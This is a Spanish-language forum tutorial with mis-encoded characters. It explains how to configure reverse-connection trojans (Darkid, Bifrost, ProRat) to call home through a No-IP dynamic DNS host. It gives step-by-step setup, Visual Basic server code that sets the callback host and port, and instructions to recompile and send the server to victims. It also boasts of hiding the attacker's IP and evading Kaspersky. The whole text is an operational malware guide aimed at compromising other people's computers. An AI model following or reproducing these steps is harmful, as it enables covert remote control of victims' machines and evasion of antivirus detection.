CONEXION INVERSA(Como implementarla en troyanos)

Hola a todos, como estoy usando Internet ADSL y el proveedor no me suministra una IP estÃƒÂ¡tica, debo encontrar un modo de obtener unaÃ¢â‚¬Â¦y esto lo vamos a lograr con el servicio de conexiÃƒÂ³n inversa de No-ip.

Paso 1: Entra en www.no-ip.com y pulsa sobre FREE NO-IP. Una vez hecho esto le das al botÃƒÂ³n de abajo Sign up now!

Cuando te registres y valides tu cuenta, pulsando sobre el link que mandaran a tu cuenta de correo, logueate en la pÃƒÂ¡gina poniendo tu email y password.

Paso 2: Pulsa sobre el botÃƒÂ³n ADD en el panel de la izquierda.
En hostname pon lo que quieras, por ejemplo: graphixx y elige algunos de los host's que ponen ahi, por ejemplo no-ip.org o sytes.net da igual cuÃƒÂ¡l sea. En Host Tipe deja DNS (A) y deberÃƒÂ¡ aparecer tu IP en IPadresses. El resto dejalo como estÃƒÂ¡ y dale a create host.
En un minuto o menos deberÃƒÂa estar.

Paso 3: Ahora vete a downloads y descarga el DUCK para Windows
Instala este programa, que tendrÃƒÂ¡s que tener abierto siempre que uses un troyano con conexiÃƒÂ³n inversa.
Al abrirlo te pedirÃƒÂ¡ tu email y password (el mismo que tienes en no-ip.com).

Una vez te loggees en el programa deberÃƒÂ¡ aparecerte algo como: graphixx.sites.net. Cliquea sobre la carita feliz hasta que se ponga asÃƒÂ: XD y entonces estarÃƒÂ¡s conectado.

Paso 4: Ahora creamos un Server con un troyano de conexiÃƒÂ³n inversa, Ej.: el Darkid o bifrost. En donde antes tenÃƒÂais que poner vuestra ip, ÃƒÂ³sea en DNS, pondrÃƒÂ©is el nombre del host (en este caso graphixx.sytes.net) y ya estÃƒÂ¡.
Ahora cuando le envÃƒÂes el Server a alguien conectarÃƒÂ¡ con no-ip y no-ip conectarÃƒÂ¡ contigo tengas la ip que tengas (siempre que tengas abierto el DUCK).

Las ventajas que le veo: 1Ã‚Âº PodrÃƒÂ¡n usar la conexiÃƒÂ³n inversa los que tengan IP dinÃƒÂ¡mica sin miedo a que les cambie la IP.
2Ã‚Âº Puedes conectarte desde casa de un amigo (solo tienes que conectarte con el DUCK y las notificaciones llegarÃƒÂ¡n a la ip de tu amigo) o puedes conectarte a las vÃƒÂctimas de algÃƒÂºn amigo si te conectas en el DUCK con su email y pass.
3Ã‚Âº MÃƒÂ¡s anonimidad, creo que si el infectado hace un netstat, solo le sale la IP del host (Proxy) que usas, y no tu ip.
Os recuerdo que esto funciona tanto en mÃƒÂ³dems como en routers, siempre y cuando los que tengan router abran el puerto que use ese troyano (el del bifrost es el 2000, y el del ProRat el 5110)
Pues nada, un saludo, y espero que les funcione a todos.
Bye

Interfaz del programa NO-IP

Observemos, donde dice ejemplo@gmail.com debe aparecer la cuenta de correo con la que te registraste.

Para cambiar de cuenta (Proxy), pulsas en el botÃƒÂ³n edit, o bien si la contraseÃƒÂ±a que suministraste no era valida.

Y podrÃƒÂ¡s observar tambiÃƒÂ©n donde dice:
Proxy 200.116.160.12, serÃƒÂ¡ la direcciÃƒÂ³n IP que le saldrÃƒÂ¡ a la victima si intenta localizarte.

Ahora miremos como configurar mi troyano para que trabaje con tu cuenta de
NO-IP.
Puedes encontrar mi troyano en el siguiente post:
Ver POST troyano Darkid 100% Colombiano

En este punto pido disculpas, ya que lo mÃƒÂ¡s adecuado seria implementar en el Cliente un editserver que genere automÃƒÂ¡ticamente los servers con la IP especificada, estoy trabajando en esoÃ¢â‚¬Â¦

Vamos a abrir el proyecto Server, y nos vamos al cÃƒÂ³digo fuente del form y allÃƒÂ ubicamos el evento form_load ( ), donde encontramos el siguiente cÃƒÂ³digoÃ¢â‚¬Â¦

'conexion inversa
Dim ip As String
Dim ipftp As String
Dim port As Integer

'ip = "graphixx.sytes.net" <--- proxy
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
port = 314
WS.RemoteHost = ip
WS.RemotePort = port
tmr_inversa.interval = "3000"

Las lÃƒÂneas que aquÃƒÂ importan son:
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
Ya que es en estas donde le estamos indicando al Server hacia donde debe marcar para conectarse, en esta parte debes cambiar graphixx.sytes.net, por tu propia cuenta de NO-IP, o bien de algÃƒÂºn otro servicio que desees utilizar.

TambiÃƒÂ©n resaltare en esta ocasiÃƒÂ³n el puerto:
Port = 314, ya que si deseas cambiarlo eres libre de hacerlo pero recuerda, estamos trabajando sobre el Server, si lo cambias aquÃƒÂ tambiÃƒÂ©n debes cambiarlo en el Cliente.

Y listo una vez hallas configurado el IP, solo queda volver a compilar el proyecto, te vas a Archivo/Generar Darkid.exe, suerte y que lo disfrutesÃ¢â‚¬Â¦

Al momento de redactar este manual era indetectable este mÃƒÂ©todo por el Kapersky, no lo probÃƒÂ© sobre otros antivirus.

Hasta una prÃƒÂ³xima entregaÃ¢â‚¬Â¦
Graphixx.